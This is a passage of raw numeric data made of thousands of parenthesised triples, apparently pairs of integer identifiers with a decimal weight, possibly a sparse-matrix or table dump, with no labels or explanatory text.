,0.98),(35,9301,1.23669),(35,9302,0.84),(35,9303,1.05),(35,9304,0.32669),(111,9304,0.32669),(35,9305,0.93331),(35,9306,1.05),(35,9307,0.28),(112,9307,0.28),(117,9307,0.56),(35,9308,1.05),(35,9309,1.12),(35,9310,1.00331),(35,9311,1.09669),(35,9312,0.32669),(35,9313,0.93331),(35,9314,1.26),(35,9315,0.23331),(106,9315,0.23331),(35,9316,0.91),(35,9317,1.05),(133,9318,0.42),(134,9318,0.42),(40,9318,0.84),(35,9318,1.26),(123,9318,2.22),(35,9319,1.14331),(35,9320,1.4),(35,9321,1.02669),(35,9322,1.28331),(35,9323,1.16669),(40,9323,1.16669),(123,9323,6.16679),(35,9324,1.4),(111,9325,0.01169),(114,9325,0.01169),(118,9325,0.01169),(35,9325,0.02338),(103,9325,0.02338),(104,9325,0.02338),(105,9325,0.02338),(112,9325,0.02338),(116,9325,0.02338),(117,9325,0.02338),(128,9325,0.03507),(68,9325,0.04676),(126,9325,0.04676),(123,9325,0.05845),(107,9325,0.07014),(106,9325,0.08183),(119,9325,0.08183),(110,9325,0.38577),(35,9326,0.84),(35,9327,0.98),(35,9328,0.98),(35,9329,1.23669),(35,9911,0.37331),(106,9911,0.37331),(35,9912,1.05),(35,9913,1.12),(35,9914,0.23331),(120,9914,0.23331),(110,9914,0.46662),(35,9915,0.88669),(35,9916,1.07331),(35,9917,0.14),(35,9918,0.95669),(35,9919,1.12),(35,9920,0.28),(35,9921,0.91),(35,9922,1.00331),(103,10546,0.88669),(107,10546,1.77338),(110,10546,1.77338),(116,10548,0.88669),(104,10757,0.02331),(105,10757,0.02331),(112,10757,0.02331),(125,10757,0.02331),(113,10757,0.04662),(118,10757,0.04662),(119,10757,0.06993),(104,10760,0.91),(40,10805,0.23331),(40,10806,1.05),(40,10807,1.28331),(40,10808,1.14331),(40,10809,1.23669),(40,10810,1.37669),(123,10810,7.27679),(52,11704,0.04669),(55,11704,0.04669),(58,11704,0.04669),(68,11704,0.04669),(58,11713,0.32669),(52,12152,0.88669),(52,12153,1.16669),(52,12154,0.18669),(55,12154,0.18669),(103,12154,0.18669),(112,12154,0.18669),(117,12154,0.18669),(123,12154,0.18669),(105,12154,0.37338),(110,12154,0.37338),(120,12154,0.74676),(52,12155,0.95669),(55,12155,0.95669),(52,12156,1.12),(55,12156,1.12),(52,12157,5.42679),(55,12398,1.05),(55,12399,1.21331),(55,12400,0.46669),(55,12401,0.98),(55,12402,1.09669),(58,12577,0.95669),(58,12578,1.19),(58,12579,1.14331),(58,12580,1.19),(58,12581,0.42),(58,12582,1.14331),(58,12583,1.19),(113,12996,0.23331),(117,12996,0.23331),(68,12999,0.23331),(110,13005,0.32669),(68,13439,0.81669),(68,13440,0.98),(68,13441,0.88669),(68,13442,1.02669),(68,13443,0.23331),(68,13444,0.95669),(68,13445,1.05),(68,13446,1.96),(68,13447,2.1),(68,13448,0.88669),(68,13449,1.09669),(68,13450,0.86331),(110,13450,0.86331),(68,13451,0.93331),(68,13452,0.98),(68,13453,1.07331),(68,13454,0.28),(103,13454,0.28),(104,13454,0.28),(105,13454,0.28),(110,13454,0.28),(112,13454,0.28),(117,13454,0.28),(107,13454,0.56),(120,13454,0.56),(68,13455,0.98),(68,13456,1.07331),(68,13457,1.05),(68,13458,1.21331),(106,13459,0.84),(112,13459,0.84),(117,13459,0.84),(123,13459,0.84),(128,13459,0.84),(119,13459,1.68),(68,13459,2.52),(110,13459,3.36),(68,13460,1.86662),(68,13461,1.14331),(68,13683,0.42),(68,13684,1.00331),(68,13685,0.46669),(68,13686,1.02669),(68,13687,1.23669),(68,13688,0.37331),(68,13689,0.95669),(68,13690,1.09669),(68,13691,0.28),(68,13692,0.93331),(68,13693,1.07331),(68,13694,0.18669),(103,13694,0.18669),(117,13694,0.18669),(107,13694,0.37338),(68,13695,0.88669),(68,13696,1.05),(77,13744,0.91),(77,13745,0.90661),(77,13746,3.0666),(116,13932,0.23331),(119,13932,0.23331),(125,13932,0.23331),(107,13932,0.46662),(120,13932,0.46662),(111,14318,0.32669),(123,14318,0.32669),(128,14318,0.32669),(113,14318,0.65338),(103,14415,0.32669),(133,14415,0.32669),(133,14419,0.23331),(120,14419,0.46662),(109,15812,0.09338),(128,15812,0.14007),(103,16175,0.86331),(103,16176,0.95669),(103,16177,0.46669),(117,16177,0.46669),(125,16177,0.46669),(103,16178,1.16669),(103,16179,1.35331),(103,16180,0.32669),(103,16181,1.02669),(103,16182,1.09669),(103,16183,0.14),(117,16183,0.14),(119,16183,0.14),(125,16183,0.14),(103,16184,0.86331),(103,16185,0.95669),(103,16186,0.42),(103,16187,1.07331),(103,16188,1.21331),(103,16189,0.37331),(103,16190,0.98),(103,16191,1.12),(103,16192,0.18669),(112,16192,0.18669),(103,16193,0.93331),(103,16194,1.00331),(103,16195,0.46669),(103,16196,1.02669),(103,16197,1.12),(103,16198,1.05),(103,16199,0.14),(103,16200,0.86331),(103,16201,0.95669),(103,16202,0.14),(103,16203,0.86331),(103,16204,1.05),(103,16205,0.84),(103,16206,0.93331),(103,16207,0.93331),(103,16208,1.00331),(103,16209,0.86331),(103,16210,0.93331),(103,16211,0.88669),(103,16212,1.02669),(103,16213,1.00331),(103,16214,1.07331),(104,16215,0.32669),(118,16215,0.32669),(123,16215,0.32669),(103,16215,0.65338),(112,16215,0.65338),(117,16215,0.65338),(125,16215,0.65338),(103,16216,0.98),(103,16217,1.26),(103,16218,1.00331),(103,16219,1.09669),(103,16220,0.18669),(117,16220,0.18669),(126,16220,0.18669),(128,16220,0.18669),(104,16220,0.37338),(105,16220,0.37338),(106,16220,0.37338),(107,16220,0.37338),(110,16220,0.37338),(119,16220,0.37338),(120,16220,0.37338),(123,16220,0.37338),(103,16221,0.95669),(103,16222,1.02669),(103,16223,0.93331),(110,16223,0.93331),(103,16224,1.09669),(103,16225,0.37331),(103,16226,0.98),(103,16227,1.12),(103,16228,0.32669),(103,16229,1.07331),(103,16230,1.14331),(103,16231,0.98),(103,16232,1.12),(103,16233,0.18669),(110,16233,0.18669),(112,16233,0.18669),(118,16233,0.18669),(120,16233,0.18669),(116,16233,0.37338),(103,16234,0.86331),(103,16235,0.98),(103,16236,0.51331),(103,16237,1.05),(103,16238,1.23669),(103,16239,0.32669),(103,16240,1.02669),(103,16241,1.14331),(103,16242,0.23331),(118,16242,0.23331),(125,16242,0.23331),(109,16242,0.46662),(103,16243,0.98),(103,16244,1.05),(103,16245,0.42),(107,16245,0.42),(118,16245,0.42),(119,16245,0.42),(126,16245,0.42),(123,16245,0.84),(103,16246,1.07331),(118,16246,1.07331),(103,16247,1.14331),(103,16248,0.32669),(103,16249,0.98),(103,16250,1.16669),(103,16251,0.32669),(120,16251,0.32669),(103,16252,0.93331),(103,16253,1.00331),(103,16254,0.28),(103,16255,1.07331),(103,16256,1.33),(103,16257,3.1334),(118,16258,0.0175),(119,16258,0.0175),(123,16258,0.0175),(125,16258,0.0175),(104,16258,0.035),(113,16258,0.035),(126,16258,0.035),(105,16258,0.0525),(112,16258,0.0525),(117,16258,0.0525),(110,16258,0.1225),(103,16258,0.1925),(103,16259,0.86331),(103,16260,0.98),(103,16261,0.84),(103,16262,0.93331),(103,16263,0.84),(103,16264,1.05),(103,16265,0.91),(103,16266,1.02669),(103,16267,2.52),(103,16268,0.93331),(103,16269,0.88669),(103,16270,0.93331),(103,16271,0.86331),(103,16272,1.05),(103,16273,0.88669),(103,16274,1.05),(103,16275,0.86331),(103,16276,1.00331),(103,16277,0.88669),(117,16277,0.88669),(103,16278,1.00331),(117,16279,0.14),(120,16279,0.14),(103,16279,0.28),(103,16280,0.88669),(103,16281,0.95669),(103,16282,1.05),(103,16283,1.14331),(103,16284,0.28),(103,16285,0.95669),(103,16286,1.07331),(103,16287,0.95669),(103,16288,1.21331),(103,16289,0.88669),(103,16290,1.00331),(103,18019,0.0175),(120,18019,0.07),(103,18020,0.98),(103,18021,1.09669),(103,18022,0.91),(103,18023,1.09669),(103,18024,0.32669),(103,18025,0.95669),(103,18026,1.14331),(110,18368,0.79331),(112,18368,0.79331),(116,18368,0.79331),(125,18368,0.79331),(104,18368,1.58662),(120,18368,1.58662),(104,18369,1.82),(104,18370,1.09669),(104,18371,1.30669),(104,18372,0.93331),(104,18373,1.00331),(104,18374,1.00331),(104,18375,1.14331),(104,18376,0.98),(104,18377,1.09669),(104,18378,0.28),(110,18378,0.28),(104,18379,0.95669),(104,18380,1.16669),(104,18381,0.14),(110,18381,0.14),(104,18382,0.84),(104,18383,0.95669),(104,18384,0.18669),(104,18385,0.93331),(104,18386,1.00331),(104,18387,0.37338),(104,18388,0.93331),(104,18389,1.07331),(104,18390,0.95669),(104,18391,1.02669),(104,18392,0.98),(104,18393,0.91),(104,18394,1.19),(104,18395,3.0666),(104,18396,0.32669),(104,18397,1.00331),(104,18398,1.07331),(104,18399,0.84),(104,18400,1.02669),(104,18401,0.95669),(104,18402,1.05),(104,18403,0.95669),(104,18404,1.12),(104,18405,0.84),(104,18406,1.07331),(104,19241,0.42),(104,19242,1.00331),(104,19243,1.16669),(104,19244,0.56),(104,19245,1.07331),(104,19246,1.16669),(104,19247,0.95669),(104,19248,0.18669),(104,19249,0.88669),(104,19250,1.14331),(104,19251,0.56),(104,19252,1.91338),(104,19253,1.14331),(104,19254,1.07331),(104,19304,0.28),(104,19305,0.91),(104,19306,1.07331),(105,19529,0.91),(105,19530,1.00331),(105,19531,0.91),(105,19532,1.02669),(105,19533,0.37331),(105,19534,1.05),(105,19535,1.12),(105,19536,0.32669),(105,19537,0.95669),(105,19538,1.02669),(105,19539,0.42),(123,19539,1.68),(105,19540,1.00331),(105,19541,1.09669),(105,19542,0.69993),(105,19543,2.87007),(105,19544,1.02669),(105,19545,1.07331),(105,19546,1.05),(105,19547,0.88669),(105,19548,0.95669),(105,19549,0.98),(105,19550,1.07331),(105,19551,0.93331),(105,19552,1.00331),(105,19553,0.18669),(126,19553,0.18669),(105,19554,0.95669),(105,19555,1.02669),(105,19556,0.28),(105,19557,0.98),(105,19558,1.21331),(105,19559,0.86331),(105,19560,1.00331),(105,19561,1.00331),(105,19562,1.07331),(105,19563,0.88669),(105,19564,0.98),(105,19565,0.69993),(105,19566,0.91),(105,19567,1.12),(105,19568,0.88669),(105,19569,0.98),(105,19570,0.93331),(105,19571,1.02669),(105,19572,0.51331),(105,19573,1.05),(105,19574,1.16669),(105,19575,0.18669),(105,19576,0.93331),(105,19577,1.05),(105,19578,0.32669),(105,19579,0.93331),(105,19580,1.02669),(105,19581,0.32669),(105,19582,1.05),(105,19583,1.23669),(105,19584,0.14),(105,19585,0.88669),(105,19586,1.02669),(105,19587,0.28),(116,19587,0.84),(105,19588,1.02669),(105,19589,1.14331),(105,19590,0.28),(105,19591,0.91),(105,19592,1.23669),(105,19593,0.23331),(105,19594,0.95669),(105,19595,1.05),(105,19596,3.0666),(105,19597,0.88669),(105,19598,0.95669),(105,19599,0.91),(105,19600,0.98),(105,19601,0.86331),(105,19602,1.07331),(105,19603,0.91),(105,19604,0.98),(105,19605,0.88669),(105,19606,1.02669),(105,20652,0.23331),(105,20653,0.88669),(105,20654,0.98),(105,20655,0.95669),(105,20656,1.14331),(105,20657,0.23331),(105,20658,0.91),(105,20659,1.05),(106,20921,0.18669),(106,20922,0.88669),(106,20923,1.07331),(106,20924,0.42),(116,20924,0.42),(125,20924,0.42),(106,20925,1.00331),(106,20926,1.30669),(106,20927,0.28),(106,20928,0.95669),(106,20929,1.23669),(106,20930,0.23331),(106,20931,0.91),(106,20932,1.00331),(106,20933,0.84),(126,20933,0.84),(106,20934,1.05),(106,20935,0.91),(106,20936,0.98),(106,20937,0.32669),(106,20938,1.02669),(106,20939,1.21331),(106,20940,0.37331),(106,20941,1.09669),(106,20942,1.35331),(106,20943,0.46662),(106,20944,0.98),(106,20945,1.14331),(106,20946,0.98),(106,20947,1.16669),(106,20948,0.23331),(106,20949,0.93331),(106,20950,1.07331),(106,20951,0.28),(106,20952,1.05),(106,20953,1.14331),(106,20954,0.98),(106,20955,1.07331),(113,20956,0.56),(106,20956,1.4),(106,20957,0.93331),(106,20958,1.02669),(106,20959,1.00331),(106,20960,1.09669),(106,20961,0.93331),(106,20962,1.05),(106,20963,0.91),(106,20964,1.07331),(106,20965,0.95669),(106,20966,1.07331),(106,20967,0.32669),(106,20968,1.05),(106,20969,1.30669),(106,20970,0.14),(119,20970,0.14),(106,20971,0.88669),(106,20972,1.16669),(109,20973,0.23331),(120,20973,0.23331),(118,20973,0.46662),(106,20973,0.69993),(106,20974,1.00331),(106,20975,1.09669),(106,20976,0.93331),(106,20977,1.12),(106,20978,0.88669),(106,20979,1.07331),(106,20980,0.28),(106,20981,1.00331),(106,20982,1.14331),(106,20983,0.93331),(106,20984,1.14331),(106,20985,0.28),(106,20986,0.93331),(106,20987,1.12),(106,20988,0.18669),(106,20989,0.98),(106,20990,1.09669),(106,20991,3.0666),(106,20992,0.79331),(119,20992,0.79331),(106,20993,0.88669),(106,20994,0.86331),(106,20995,1.02669),(106,20996,0.88669),(106,20997,1.07331),(106,20998,0.86331),(106,20999,1.14331),(106,21000,0.86331),(106,21001,1.00331),(106,21002,1.00331),(106,21003,0.88669),(106,21004,0.95669),(106,22036,1.02669),(106,22037,1.21331),(106,22038,0.28),(106,22039,0.91),(106,22040,1.05),(106,22041,1.30676),(106,22042,1.02669),(106,22043,1.19),(106,22044,2.24),(106,22045,1.21331),(106,22046,1.33),(106,22047,0.37331),(106,22048,1.05),(106,22049,1.19),(106,22050,0.65338),(106,22051,0.95669),(106,22052,1.09669),(106,22053,0.93331),(106,22054,1.14331),(106,22055,0.84),(106,22056,1.00331),(106,22057,1.16669),(106,22058,1.02669),(106,22059,1.14331),(106,22060,0.98),(106,22061,1.16669),(110,22298,0.98),(107,22298,1.96),(107,22299,0.74662),(107,22300,2.24),(107,22301,2.70662),(107,22302,1.96),(107,22303,2.1),(107,22304,1.86662),(107,22305,2.05338),(107,22306,1.91338),(107,22307,2.05338),(110,22308,0.14),(114,22308,0.14),(119,22308,0.14),(113,22308,0.28),(125,22308,0.28),(126,22308,0.28),(107,22308,0.56),(107,22309,3.73324),(107,22310,4.2),(120,22311,0.28),(107,22311,0.56),(107,22312,1.91338),(107,22313,2.28662),(107,22314,1.07331),(107,22315,1.12),(107,22316,0.84),(107,22317,1.14331),(107,22318,1.30669),(107,22319,1.02669),(107,22320,1.19),(112,22321,0.28),(126,22321,0.28),(107,22321,1.12),(107,22322,3.82676),(107,22323,4.10676),(107,22324,3.0666),(107,22325,3.82676),(107,22326,4.38676),(107,22327,1.91338),(107,22328,1.14331),(107,22329,1.14331),(107,23004,0.65338),(107,23005,1.96),(107,23006,2.1),(107,23007,1.96),(107,23008,2.14662),(116,23189,0.37331),(125,23189,0.74662),(116,23190,0.98),(110,23195,0.86331),(110,23196,0.95669),(110,23206,0.23331),(110,23207,0.88669),(120,23209,0.14),(110,23217,0.28),(120,23235,0.28),(109,24451,0.28),(109,24452,0.98),(109,24453,1.12),(109,24454,0.88669),(109,24455,1.05),(109,24456,0.95669),(109,24457,1.07331),(109,24458,0.42),(109,24459,1.02669),(109,24460,1.09669),(109,24461,0.37331),(109,24462,1.02669),(109,24463,1.33),(109,24464,0.88669),(109,24465,1.23669),(109,24466,0.23331),(109,24467,0.98),(109,24468,1.05),(109,25041,0.09331),(121,25041,0.09331),(109,25042,1.02669),(109,25043,1.07331),(109,25044,0.23331),(109,25045,1.07331),(109,25046,1.14331),(109,25047,0.32669),(109,25048,0.91),(109,25049,1.05),(109,25050,0.28),(109,25051,1.14331),(109,25052,1.21331),(109,25053,0.23331),(109,25054,0.93331),(109,25055,1.00331),(109,25056,0.46662),(109,25057,0.93331),(109,25058,1.00331),(109,25059,0.98),(109,25060,1.02669),(109,25066,1.68),(109,25067,0.91),(109,25068,0.93331),(110,25763,0.86331),(110,25764,1.05),(110,25765,0.86331),(120,25765,0.86331),(110,25766,1.05),(111,25767,0.14),(119,25767,0.14),(110,25767,0.28),(110,25768,0.86331),(110,25769,1.00331),(110,25770,1.02669),(110,25771,1.21331),(110,25772,0.28),(110,25773,0.91),(110,25774,1.00331),(110,25775,0.18669),(110,25776,0.88669),(110,25777,1.02669),(110,25778,1.12),(110,25779,0.93331),(110,25780,0.86331),(116,25780,0.86331),(110,25781,0.93331),(116,25781,0.93331),(110,25782,1.05),(110,25783,1.12),(110,25784,0.81669),(112,25784,0.81669),(110,25785,0.98),(110,25786,1.86662),(110,25787,1.02669),(110,25788,1.09669),(110,25789,0.93331),(110,25790,1.02669),(110,25791,0.88669),(110,25792,0.95669),(110,25793,0.93331),(110,25794,1.00331),(110,25795,1.21331),(110,25796,0.93331),(110,25797,1.00331),(110,25798,2.1),(110,25799,1.16669),(110,25800,1.16669),(110,25801,0.98),(110,25802,1.07331),(110,25803,0.88669),(110,25804,0.95669),(110,25805,0.95669),(110,25806,1.02669),(110,25807,1.00331),(110,25808,1.07331),(110,25809,0.95669),(110,25810,1.02669),(110,25811,1.00331),(110,25812,1.07331),(110,25813,0.95669),(110,25814,1.02669),(110,25815,0.93331),(110,25816,1.02669),(110,25817,0.95669),(110,25818,1.12),(110,25819,0.95669),(110,25820,1.02669),(110,25821,0.93331),(110,25822,0.93331),(110,25823,1.07331),(110,25824,1.02669),(110,25825,1.30669),(110,25826,0.28),(110,25827,0.93331),(110,25828,1.07331),(110,25829,0.98),(110,25830,1.12),(110,25831,1.00331),(110,25832,1.07331),(110,25833,1.02669),(110,25834,0.46669),(110,25835,1.00331),(110,25836,1.19),(110,25837,0.95669),(110,25838,0.98),(110,25839,1.12),(110,25840,1.02669),(110,25841,1.28331),(110,25842,0.91),(110,25843,1.00331),(110,25844,0.65338),(110,25845,0.95669),(110,25846,1.09669),(110,25847,0.93331),(110,25848,1.02669),(110,25849,1.12),(110,25850,1.09669),(110,25851,1.30669),(110,25852,1.12),(110,25853,1.33),(110,25854,1.00331),(110,25855,1.19),(110,25856,0.32669),(110,25857,0.98),(110,25858,1.21331),(110,25859,0.18669),(113,25859,0.18669),(110,25860,0.86331),(110,25861,0.98),(110,25862,0.18669),(110,25863,0.93331),(110,25864,1.05),(110,25865,0.93331),(110,25866,1.02669),(110,25867,0.23331),(113,25867,0.23331),(110,25868,0.88669),(110,25869,1.02669),(110,25870,0.28),(120,25870,0.28),(110,25871,1.07331),(110,25872,1.33),(110,25873,1.12),(110,25874,1.30669),(110,25875,0.37331),(110,25876,0.98),(110,25877,1.16669),(110,25878,0.32669),(110,25879,0.28),(110,25880,0.91),(110,25881,1.00331),(110,25882,6.04317),(110,25883,2.1),(110,25884,1.86662),(110,25885,2.24),(110,25886,0.98),(110,25887,1.07331),(110,25888,1.16669),(110,25889,0.81669),(110,25890,0.95669),(110,25891,0.84),(110,25892,1.07331),(110,25893,2.52),(110,25894,0.95669),(110,25895,0.98),(110,25896,0.98),(110,25897,0.95669),(110,25898,1.33),(110,25899,1.58662),(110,25900,1.82),(110,25901,0.95669),(110,25902,1.02669),(110,25903,1.91338),(110,25904,1.16669),(110,25905,1.05),(110,25906,0.98),(110,25907,1.07331),(110,25908,0.86331),(110,25909,0.98),(110,25910,0.86331),(110,25911,1.00331),(110,25912,0.93331),(110,25913,1.09669),(110,25914,4.2),(110,25915,0.95669),(110,25916,1.86662),(110,25917,0.98),(110,25918,1.00331),(110,25919,0.86331),(110,25920,0.95669),(110,25921,0.91),(110,25922,1.00331),(110,25923,0.91),(110,25924,1.09669),(110,25925,0.88669),(110,25926,1.02669),(110,25927,1.86662),(110,25928,1.12),(110,25929,1.05),(110,25930,1.05),(110,25931,0.98),(110,25932,0.95669),(110,25933,1.00331),(110,25934,0.88669),(110,25935,1.09669),(110,25936,0.91),(110,25937,1.05),(110,29305,0.23331),(110,29306,0.91),(110,29307,1.12),(110,29308,0.42),(110,29309,0.98),(110,29310,1.07331),(110,29311,0.88669),(110,29312,1.00331),(110,29313,0.95669),(110,29314,1.05),(110,29315,0.42),(110,29316,0.98),(110,29317,1.07331),(110,29318,0.46669),(110,29319,1.14331),(110,29320,1.33),(110,29321,0.32669),(110,29322,0.95669),(110,29323,1.16669),(110,29324,0.42),(110,29325,0.98),(110,29326,1.07331),(110,29327,0.56007),(110,29328,0.88669),(110,29329,1.07331),(110,29330,0.93331),(110,29331,1.19),(110,29332,1.00331),(110,29333,1.26),(111,29883,0.84),(111,29884,0.98),(111,29885,0.37331),(111,29886,0.98),(111,29887,1.02669),(111,29888,0.81669),(111,29889,1.02669),(111,29890,1.05),(111,29891,1.12),(111,29892,0.37338),(111,29893,0.86331),(111,29894,1.14331),(111,29895,0.86331),(111,29896,1.09669),(111,29897,0.32669),(111,29898,1.05),(111,29899,1.23669),(111,29900,0.46669),(111,29901,0.98),(111,29902,1.16669),(111,29903,0.23331),(111,29904,1.00331),(111,29905,1.07331),(111,29906,0.23331),(111,29907,1.02669),(111,29908,1.33),(111,29909,0.37331),(111,29910,0.93331),(111,29911,1.00331),(111,29912,3.0666),(111,29913,0.95669),(114,29913,0.95669),(111,29914,1.05),(111,29915,0.28),(111,29916,1.05),(111,29917,1.09669),(111,32068,0.28),(111,32069,1.05),(111,32070,1.14331),(111,32071,0.28),(111,32072,0.93331),(111,32073,1.09669),(111,32074,1.00331),(111,32075,1.05),(111,32076,0.65338),(111,32077,1.05),(111,32078,1.19),(111,32079,0.91),(111,32080,1.05),(111,32081,0.28),(111,32082,0.95669),(111,32083,1.02669),(111,32084,0.28),(111,32085,0.98),(111,32086,1.07331),(111,32087,0.37331),(111,32088,1.05),(111,32089,1.12),(111,32090,0.32669),(111,32091,0.95669),(111,32092,1.19),(111,32093,0.23331),(111,32094,0.93331),(111,32095,1.19),(111,32096,0.42),(111,32097,1.09669),(111,32098,1.23669),(111,32099,0.7),(111,32100,1.35331),(111,32101,1.4),(111,32102,0.32669),(111,32103,0.93331),(111,32104,1.16669),(111,32105,0.23331),(111,32106,0.88669),(111,32107,1.00331),(111,32108,0.46669),(111,32109,0.98),(111,32110,1.07331),(111,32111,0.42),(111,32112,1.05),(111,32113,1.16669),(111,32114,0.37331),(111,32115,0.23331),(111,32116,0.91),(111,32117,0.98),(111,32118,0.56),(111,32119,1.02669),(111,32120,1.09669),(111,32121,1.12),(111,32122,1.28331),(111,32123,0.46662),(111,32124,0.98),(111,32125,1.19),(111,32126,1.05),(111,32127,1.28331),(112,32349,0.28),(112,32350,0.91),(112,32351,1.00331),(123,32352,0.18669),(112,32352,0.56007),(112,32353,1.00331),(112,32354,1.09669),(112,32355,0.98),(112,32356,1.07331),(112,32357,0.86331),(112,32358,1.00331),(112,32359,0.74662),(112,32360,1.05),(112,32361,1.19),(112,32362,0.98),(112,32363,1.19),(112,32364,0.93331),(112,32365,1.00331),(112,32366,0.84),(112,32367,1.05),(112,32368,1.14331),(112,32369,1.02669),(112,32370,1.12),(112,32371,0.32669),(112,32372,0.98),(112,32373,1.23669),(112,32374,0.98),(112,32375,1.09669),(112,32376,0.32669),(112,32377,0.95669),(112,32378,1.05),(112,32379,0.95669),(112,32380,0.93331),(112,32381,0.91),(112,32382,1.16669),(112,32383,0.86331),(112,32384,0.98),(112,32385,0.81669),(112,32386,0.93331),(112,32387,0.81669),(112,32388,0.91),(112,32389,0.91),(112,32390,1.02669),(112,32391,0.88669),(112,32392,1.02669),(112,32393,0.95669),(118,32393,0.95669),(112,32394,1.07331),(112,32395,0.98),(112,32396,1.02669),(112,32397,0.93331),(112,32398,1.02669),(112,32399,1.00331),(112,32400,1.19),(112,32401,0.98),(112,32402,1.09669),(112,32403,0.32669),(112,32404,1.07331),(112,32405,1.23669),(112,32406,0.95669),(112,32407,1.05),(112,32408,1.09669),(112,32409,1.37669),(112,32410,3.0666),(112,32411,0.95669),(112,32412,1.02669),(112,32413,0.86331),(112,32414,1.05),(112,32415,0.86331),(112,32416,1.00331),(112,32417,0.84),(112,32418,1.16669),(112,32419,1.05),(112,33407,0.32669),(126,33407,0.32669),(112,33408,0.95669),(112,33409,1.00331),(112,33410,0.93331),(112,33411,1.07331),(112,33412,0.28),(112,33413,0.98),(112,33414,1.07331),(128,33612,0.18669),(113,33612,0.56007),(113,33613,0.93331),(113,33614,1.05),(113,33615,0.93331),(113,33616,1.07331),(113,33617,0.88669),(128,33617,0.88669),(113,33618,1.02669),(113,33619,1.05),(113,33620,1.19),(113,33621,0.18669),(113,33622,0.93331),(113,33623,1.09669),(113,33624,1.00331),(113,33625,1.07331),(113,33626,0.93331),(113,33627,1.07331),(113,33628,1.02669),(113,33629,1.09669),(113,33630,0.98),(113,33631,1.16669),(113,33632,0.93324),(113,33633,0.95669),(113,33634,1.14331),(113,33635,0.91),(113,33636,1.05),(113,33637,0.98),(113,33638,1.14331),(113,33639,0.88669),(113,33640,1.09669),(113,33641,0.91),(113,33642,0.98),(113,33643,0.88669),(113,33644,0.98),(113,33645,0.32669),(113,33646,1.05),(113,33647,1.19),(113,33648,0.28),(113,33649,0.95669),(113,33650,1.07331),(113,33651,0.91),(113,33652,1.05),(113,33653,0.23331),(113,33654,0.88669),(113,33655,1.05),(113,33656,1.82),(113,33657,1.05),(113,33658,1.09669),(113,33659,1.00331),(113,33660,1.09669),(126,33661,0.18669),(113,33661,0.37338),(128,33661,0.56007),(113,33662,1.00331),(113,33663,1.14331),(113,33664,0.93331),(128,33664,0.93331),(113,33665,1.09669),(128,33665,1.09669),(113,33666,0.23331),(113,33667,0.95669),(113,33668,1.09669),(113,33669,0.28),(113,33670,0.91),(113,33671,1.05),(113,33672,1.02669),(113,33673,1.14331),(113,33674,2.19338),(113,33675,1.33),(113,33676,1.30669),(113,33677,0.95669),(113,33678,1.05),(113,33679,1.05),(113,33680,1.14331),(113,33681,1.00331),(113,33682,1.12),(113,33683,1.07331),(113,33684,1.14331),(113,33685,0.93338),(113,33686,1.02669),(113,33687,1.21331),(113,33688,1.07331),(113,33689,1.21331),(113,33690,0.88669),(113,33691,1.02669),(113,33692,1.00331),(113,33693,1.23669),(113,35083,0.32669),(113,35084,0.93331),(113,35085,1.14331),(113,35086,1.12),(113,35087,1.26),(113,35088,1.19),(113,35089,1.30669),(113,35090,0.91),(113,35091,1.05),(113,35092,0.91),(113,35093,1.05),(113,35094,0.32669),(113,35095,0.98),(113,35096,1.09669),(114,35253,0.14),(118,35253,0.14),(128,35253,0.14),(114,35254,0.81669),(114,35255,0.91),(114,35256,0.37331),(114,35257,1.05),(114,35258,1.12),(114,35259,0.46669),(114,35260,1.02669),(114,35261,1.07331),(114,35262,0.46669),(114,35263,1.09669),(114,35264,1.21331),(114,35265,0.91),(114,35266,1.12),(114,35267,0.32669),(114,35268,0.98),(114,35269,1.07331),(114,35270,0.93324),(114,35271,0.86331),(114,35272,0.95669),(114,35273,0.93331),(114,35274,1.07331),(114,35275,2.00662),(114,35276,2.1),(114,35277,0.69993),(114,35278,1.02669),(114,35279,1.26),(114,35280,1.02669),(114,35281,1.16669),(114,35282,0.91),(114,35283,1.05),(114,35284,3.0666),(114,35285,1.02669),(114,35919,0.37331),(114,35920,1.02669),(114,35921,1.19),(114,35922,0.23331),(121,35922,0.23331),(114,35923,1.07331),(114,35924,1.28331),(114,35925,0.46669),(114,35926,1.00331),(114,35927,1.14331),(114,35928,0.37331),(114,35929,1.00331),(114,35930,1.28331),(114,35931,0.14),(114,35932,0.84),(114,35933,1.09669),(119,36067,0.81669),(119,36068,0.91),(117,36076,0.91),(117,36077,1.07331),(116,37091,1.09669),(116,37092,0.18669),(116,37093,0.88669),(116,37094,1.07331),(116,37095,0.93331),(116,37096,1.02669),(116,37097,1.09669),(116,37098,1.72662),(116,37099,0.93331),(116,37100,0.93331),(116,37101,0.37331),(116,37102,0.98),(116,37103,1.09669),(116,37104,1.14331),(116,37105,1.21331),(116,37106,0.51331),(116,37107,1.16669),(116,37108,1.26),(116,37109,1.05),(116,37110,1.12),(116,37111,0.86331),(116,37112,1.05),(116,37113,0.88669),(116,37114,1.12),(116,37115,0.32669),(116,37116,0.98),(116,37117,1.16669),(116,37118,1.02669),(116,37119,2.05338),(116,37120,1.23669),(116,37121,1.21331),(116,37122,0.98),(116,37123,1.12),(116,37124,0.28),(116,37125,0.93331),(116,37126,1.12),(116,37127,0.93338),(116,37128,1.12),(116,37129,1.23669),(116,37130,1.07331),(116,37131,1.26),(116,37132,0.46669),(116,37133,1.07331),(116,37134,1.19),(116,37135,0.86331),(116,37136,0.95669),(116,37137,0.93331),(116,37138,1.09669),(116,37599,0.42),(116,37600,1.00331),(116,37601,1.16669),(117,37842,0.88669),(117,37843,1.00331),(117,37844,1.05),(117,37845,1.16669),(117,37846,0.51331),(117,37847,1.07331),(117,37848,1.23669),(117,37849,0.86331),(117,37850,1.02669),(117,37851,1.00331),(117,37852,1.14331),(117,37853,0.93331),(117,37854,1.02669),(117,37855,0.88669),(117,37856,0.95669),(117,37857,0.93331),(117,37858,1.14331),(117,37859,0.95669),(117,37860,1.12),(117,37861,0.32669),(117,37862,1.00331),(117,37863,1.16669),(117,37864,0.86331),(117,37865,0.95669),(117,37866,1.00331),(117,37867,1.19),(117,37868,0.46669),(117,37869,1.21331),(117,37870,1.28331),(117,37871,0.93331),(117,37872,1.00331),(117,37873,0.98),(117,37874,1.09669),(117,37875,0.14),(117,37876,0.93331),(117,37877,1.05),(117,37878,0.37331),(117,37879,1.07331),(117,37880,1.19),(125,37881,0.18669),(126,37881,0.18669),(117,37881,0.74676),(117,37882,0.93331),(117,37883,1.16669),(117,37884,1.72662),(117,37885,0.93331),(117,37886,0.95669),(117,37887,1.05),(117,37888,1.16669),(117,37889,0.37331),(117,37890,1.16669),(117,37891,1.4),(117,37892,0.32669),(117,37893,0.93331),(117,37894,1.05),(117,37895,0.98),(117,37896,